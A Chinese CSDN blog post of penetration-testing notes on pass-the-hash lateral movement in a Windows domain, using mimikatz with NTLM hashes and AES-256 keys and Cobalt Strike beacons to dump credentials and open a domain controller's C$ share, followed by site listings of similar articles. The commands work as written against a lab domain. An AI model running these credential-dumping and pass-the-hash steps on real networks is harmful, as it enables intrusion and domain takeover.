【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】

最新推荐文章于 2024-05-25 21:25:40 发布
最新推荐文章于 2024-05-25 21:25:40 发布
阅读量3.3k 收藏 3
点赞数
分类专栏: 渗透测试 内网渗透 文章标签: 安全 网络安全 内网渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/121332867
版权

文章目录

1. mimikatz

地址:https://github.com/gentilkiwi/mimikatz

1.1 NTLM Hash传递攻击

  1. 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段】
  2. 使用mimikatz进行Hash传递攻击:
.\mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:aa8j.com /ntlm:b2cec107e5cc49dab187735fdefd25cf"

此时会弹出一个CMD窗口:
在这里插入图片描述

  1. 访问任意域成员机默认共享:
dir \\dc-1\c$
# 注意,使用主机名访问。

在这里插入图片描述

1.2 AES-256 哈希传递攻击

此方法仅适用于本机安装了 KB2871997 补丁的情况。同理,AES-125密钥也可进行传递攻击。

  1. 获得AES-256 哈希值
.\mimikatz "privilege::debug" "sekurlsa::ekeys"

在这里插入图片描述
2. 传递攻击

.\mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:aa8j.com /aes256:46b149520361a41bca6502c80888bb85aa148f575893bebb30df38845b49056e"

此时同样会弹出一个CMD:
在这里插入图片描述
3. 访问任意域成员机默认共享:

dir \\dc-1\c$
# 注意,使用主机名访问。

2. CS

2.1 获得一个Beacon

在这里插入图片描述

2.2 dump Hash

两种方法结合使用。

2.2.1 方法一

右键被控主机 —> Access —> Dump Hashes

在这里插入图片描述
在这里插入图片描述

2.2.2 方法二

右键被控主机 —> Access —> Run Mimikatz

在这里插入图片描述
在这里插入图片描述

2.2.3 查看

View —> Credentials

在这里插入图片描述
在这里插入图片描述
拷贝:
在这里插入图片描述

2.3 哈希传递攻击

在beacon输入pth 域名\用户名 散列值

pth AA8J\Administrator b2cec107e5cc49dab187735fdefd25cf

在这里插入图片描述
在这里插入图片描述
访问DC-1默认共享:

shell dir \\dc-1\c$

在这里插入图片描述
在这里插入图片描述

AA8j
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1572
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
内网渗透(不出网上线CS
最新发布
qq_64302290的博客
05-25 1127
cs是一款强大的控制windows木马的工具。是目前渗透中常使用的一个工具。
内网渗透系列-mimikatz使用以及后门植入
lza20001103的博客
04-15 1134
内网渗透系列-mimikatz使用以及后门植入
cs给msf传shell+mimikatz读取明文密码
vt_yjx的博客
05-22 584
set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)密码是null,是因为官方改的。然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中。windows输入密码的进程是winlogon.exe。考虑sam文件了,可以dump出来本地破解出明文。上传一个锁屏脚本,管理员重新输入密码后可以抓明文。mimikatz就抓内存中的明文。set lport 自己的端口号。set lhost 本机ip。
hash传递攻击
qq_58000413的博客
06-05 724
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
哈希传递
2301_77915293的博客
07-06 112
Windows操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在 ntds.dit_中加密后为散列值。Windows 操作系统中的密码一般由两部分组成一部分为 LM Hash,另一部分为 NTLMHash。在 Windows 操作系统中,Hash 的结构通常如下。
使用mimikatz利用哈希传递获取域控权限
qq_54713392的博客
06-29 988
使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7 使用pwdump7,执行命令Pwdump7.exe 导出信息到1.txt中 复制出ntlm CE28B42F9943D0552385BC5F6338F9B9 (2)在
mimikatz hash传递--获取域控权限
qq_46635165的博客
10-18 1887
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了域内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
内网渗透专用-mimikatz
05-06
懂得都懂!
[后渗透]Mimikatz使用大全1
08-03
总结来说,Mimikatz渗透测试安全研究中不可或缺的工具,它能够帮助安全专家发现潜在的安全漏洞,同时对于攻击者而言,它也是一把双刃剑,可能被滥用进行非法活动。因此,了解Mimikatz使用和防护措施对于确保...
mimikatz猕猴桃渗透测试神器 读取密码 win10 不可用
04-27
渗透测试神奇 安全检测 网络安全 读取密码
渗透成绩管理系统_从权限到数据.pdf
05-19
渗透测试】是一种网络安全评估方法,通过模拟恶意攻击来检测系统的漏洞和安全性。在这个案例中,作者Ettack@F4ck Team分享了如何渗透一个学校的课程管理系统,目的是获取成绩和用户密码等敏感数据。 首先,渗透...
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 5012
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
mimikatz使用哈希 ntlm传递 票据传递
YouthBelief的博客
12-16 1900
(1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 sekurlsa::logonpasswords (4) 哈希传递哈希传递到其他计算机上 进行登录域控验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
正确传递hash引用
ace_fei的专栏
06-10 1207
    大家应该知道哈希引用需要初始化,这我就不多说了。    我就主要分享下传入哈希引用有两种方式    #!/usr/bin/perluse Data::Dumper;sub foo { my $h = shift; $h->{hello} = World!;}my $a;my $b = {};foo($a); print Dumper(
后渗透模块之Hash传递
weixin_45007073的博客
01-26 375
前言 我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
渗透测试笔记】之【内网渗透——横向移动使用mimikatzCS进行哈希传递攻击】_cs 如何使用mimikatz
2401_84970989的博客
05-13 180
右键被控主机 —> Access —> Run Mimikatz。右键被控主机 —> Access —> Dump Hashes。
使用mimikatz进行windows中存储的密码查看
09-07
在Windows系统中,mimikatz是一种常用的密码查看工具。其使用方法如下: 首先,下载并安装mimikatz工具。可以在GitHub上找到最新的版本。 安装完成后,打开命令提示符,并切换到mimikatz的安装路径下。 运行命令"privilege::debug"以获取调试权限。 接下来,运行命令"sekurlsa::logonpasswords",即可开始查看存储在Windows系统中的密码信息。 mimikatz会扫描系统内存,并提取出已存储的密码。其中包括本地管理员、远程桌面、Windows凭据等多种密码信息。 mimikatz还可以通过其他命令进一步查看和操作密码信息,比如"sekurlsa::pth"可以创建一个新的访问令牌,并利用已有的用户凭据进行访问。 需要注意的是,mimikatz是一个强大且复杂的工具,仅应在合法和授权的环境下使用。它可以用于安全审计、渗透测试等用途,但也容易被恶意分子用于进行攻击。因此,在没有合法授权的情况下,请不要使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值